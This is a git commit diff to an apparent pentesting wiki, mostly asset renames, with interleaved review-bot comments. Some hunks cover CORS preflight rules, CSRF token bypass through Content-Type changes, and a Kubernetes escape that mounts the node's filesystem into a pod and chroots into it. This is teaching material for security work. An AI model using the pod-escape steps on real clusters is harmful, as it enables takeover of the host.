GitBook: [master] 8 pages and 14 assets modified

This commit is contained in:
CPol 2021-05-29 20:00:49 +00:00 committed by gitbook-bot
parent dfca7327db
commit 2f669dffc0
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
15 changed files with 24 additions and 22 deletions

@ -134,7 +134,7 @@ Some interesting attributes:
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\): * [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\):
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides. * Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
![](../../../.gitbook/assets/image%20%28509%29.png) ![](../../../.gitbook/assets/image%20%28507%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28512%29.png) ![](../../../.gitbook/assets/image%20%28512%29.png)

@ -32,7 +32,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
``` ```
![](../../../.gitbook/assets/image%20%28495%29%20%281%29.png) ![](../../../.gitbook/assets/image%20%28495%29%20%281%29%20%281%29.png)
### Volume Shadow Copies ### Volume Shadow Copies
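Review bot: the context line at the top of this hunk still reads "you can sue the tool Rifiuti"; fix the typo to "use" while this file is being touched. The hunk itself only renames the screenshot asset (image (495) (1).png becomes image (495) (1) (1).png); the `.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle` command line is unchanged.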
@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\). Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
![](../../../.gitbook/assets/image%20%28477%29%20%281%29.png) ![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%281%29.png)
### USB Detective ### USB Detective
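Review bot: "the timestamps about when the USB connection was produced" is awkward; suggest "the timestamps of when the USB device was connected (search for `Section start`)". Only the screenshot asset changes in this hunk (image (477) (1).png becomes image (477) (2) (1).png); the `C:\Windows\inf\setupapi.dev.log` reference is unchanged.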

@ -593,7 +593,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
5. Reproduce the problem. 5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](../../.gitbook/assets/image%20%28466%29%20%281%29.png) ![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%281%29.png)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
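Review bot: "Accessing the Device Shell" is referenced as a section but not linked; turn it into an anchor link so the reader can jump to it. Only the screenshot asset changes here (image (466) (1).png becomes image (466) (2) (1).png); steps 5 and 6 and the socat sentence are unchanged.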

@ -89,9 +89,13 @@ Access-Control-Max-Age: 240
![](../.gitbook/assets/preflight.svg) ![](../.gitbook/assets/preflight.svg)
Note that in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it. Note that usually \(depending on the content-type and headers set\) in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.
**Therefore, CORS doesn't protect against CSRF \(but it can be helpful\).** **Therefore, CORS doesn't protect against CSRF \(but it can be helpful\).**
{% hint style="info" %}
**Check** [**in this link**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) **the conditions of a request to avoid sending of a pre-flight request**
{% endhint %}
## Exploitable misconfigurations ## Exploitable misconfigurations
Notice that most of the **real attacks require `Access-Control-Allow-Credentials`** to be set to **`true`** because this will allow the browser to send the credentials and read the response. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself. Notice that most of the **real attacks require `Access-Control-Allow-Credentials`** to be set to **`true`** because this will allow the browser to send the credentials and read the response. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself.
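Review bot: "it must contains an Access-Control-Allow-Origin header allowing it" is ungrammatical on both sides of the diff; suggest "the response must contain an Access-Control-Allow-Origin header that allows the requesting origin". The added qualifier "usually (depending on the content-type and headers set)" is correct, and the new hint pointing at MDN's simple-request conditions is the right reference, but the text should name the concept ("simple requests") so the hint's "the conditions of a request to avoid sending of a pre-flight request" is recognisable; reword that phrase to "the conditions under which a request is sent without a preflight".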

@ -73,7 +73,13 @@ In this situation, the attacker can again perform a CSRF **attack if the web sit
### Content-Type change ### Content-Type change
You can change to POST Content-Type to _**application/json, application/x-url-encoded**_ or _**form-multipart**_ and maybe you will be able to bypass the CSRF token. According to [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests), n order to **avoid preflight** requests using **POST** method these are the allowed Content-Type values:
* **`application/x-www-form-urlencoded`**
* **`multipart/form-data`**
* **`text/plain`**
However, note that the **severs logic may vary** depending on the **Content-Type** used so you should try the values mentioned and others like **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
### Referrer / Origin check bypass ### Referrer / Origin check bypass
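Review bot: the added paragraph contradicts its own list: the opening sentence names "application/x-url-encoded" and "form-multipart", which are not real media types, while the bullets correctly give `application/x-www-form-urlencoded` and `multipart/form-data`; align the sentence with the bullets. In the same lines fix "n order" to "in order", "severs logic" to "server's logic", "change to POST Content-Type" to "change the POST Content-Type", and remove the empty bold/italic markers around the commas in the last line (`_**,**_` and `_._`), which render as literal punctuation glitches.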

@ -128,7 +128,7 @@ You can iterate over the ascii letters, digits and symbols:
### **Discover valid LDAP fields** ### **Discover valid LDAP fields**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of ****[**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**.** LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
```python ```python
#!/usr/bin/python3 #!/usr/bin/python3
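Review bot: the new side of the "default LDAP attributes here" line breaks the markdown link: the escaped `\*\*\[` ... `\]\(` sequence renders the brackets and asterisks literally and the link text ends up outside the link. Revert to the original form `[**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)` (URL-encoded space, no stray `****` before it). Grammar in the same line: "LDAP objects contain" rather than "contains".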

@ -76,11 +76,13 @@ The following `kubectl` commands indicates just how to list the objects. If you
{% endhint %} {% endhint %}
### Using kubectl ### Using kubectl
when using kubectl it might come in handy to define a temporary alias, if the token used is different to the one defined in `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount`. when using kubectl it might come in handy to define a temporary alias, if the token used is different to the one defined in `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount`.
```bash ```bash
alias kubectl='kubectl --token=<jwt_token>' alias kubectl='kubectl --token=<jwt_token>'
``` ```
[kubectl cheatsheet](https://kubernetes.io/docs/reference/kubectl/cheatsheet/) [kubectl cheatsheet](https://kubernetes.io/docs/reference/kubectl/cheatsheet/)
### Get namespaces ### Get namespaces
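Review bot: the hunk header (-76,11 +76,13) says two lines were added but no text differs between the two sides, so the change is whitespace only and should be described as such. More importantly, the alias `kubectl --token=<jwt_token>` puts the service-account token on every kubectl command line, where it is visible in shell history and in process listings to other users on the host; the text should say so and point to a kubeconfig file with restrictive permissions (passed via `--kubeconfig`) as the safer way to hold the credential. Also capitalise "when using kubectl" at the start of the sentence.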
@ -273,12 +275,10 @@ If you are able to create new pods you might be able to escape from them to the
```bash ```bash
kubectl get pod <name> [-n <namespace>] -o yaml kubectl get pod <name> [-n <namespace>] -o yaml
``` ```
Then you create your attack.yaml file Then you create your attack.yaml file
```yaml ```yaml
apiVersion: v1 apiVersion: v1
kind: Pod kind: Pod
@ -300,35 +300,29 @@ spec:
- name: host-fs - name: host-fs
mountPath: /root mountPath: /root
restartPolicy: Never restartPolicy: Never
``` ```
[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba) [original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
After that you create the pod After that you create the pod
```bash ```bash
kubectl apply -f attacker.yaml [-n <namespace>] kubectl apply -f attacker.yaml [-n <namespace>]
``` ```
Now you can switch to the created pod as follows Now you can switch to the created pod as follows
```bash ```bash
kubectl exec -it attacker-pod [-n <namespace>] -- bash # attacker-pod is the name defined in the yaml file kubectl exec -it attacker-pod [-n <namespace>] -- bash # attacker-pod is the name defined in the yaml file
``` ```
And finally you chroot into the node's system And finally you chroot into the node's system
```bash ```bash
chroot /root /bin/bash chroot /root /bin/bash
``` ```
Information obtained from:\ Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)\
[Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
## Sniffing ## Sniffing
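Review bot: the "Information obtained from:" change collapses the two source links onto one line and drops the trailing-backslash hard breaks, so the two reference titles now run together with no separator; render them as a bullet list (or keep the hard breaks) so each is a distinct item. The manifest is introduced as `attack.yaml` in the preceding hunk but applied here as `kubectl apply -f attacker.yaml`; make the filename consistent. From the defensive side, the `host-fs` volume mounted at `/root` followed by `chroot /root /bin/bash` is the insecure host-path pattern named in the first reference title; one sentence noting that an admission policy which forbids host-path volumes prevents this escape would balance the section.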

@ -113,5 +113,3 @@ y por aqui la metodologia owasp para analizar firmware: [https://github.com/scri
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics. * [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics.
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs * [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
##
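Review bot: removing the empty trailing `##` heading is correct; an empty heading renders as a blank bar. The context line at the top of the hunk is still in Spanish in an otherwise English document ("y por aqui la metodologia owasp para analizar firmware", i.e. "and here the OWASP methodology for analysing firmware"); translate it while here. "BB programs" in the bbrecon bullet should be spelled out as "bug bounty programs".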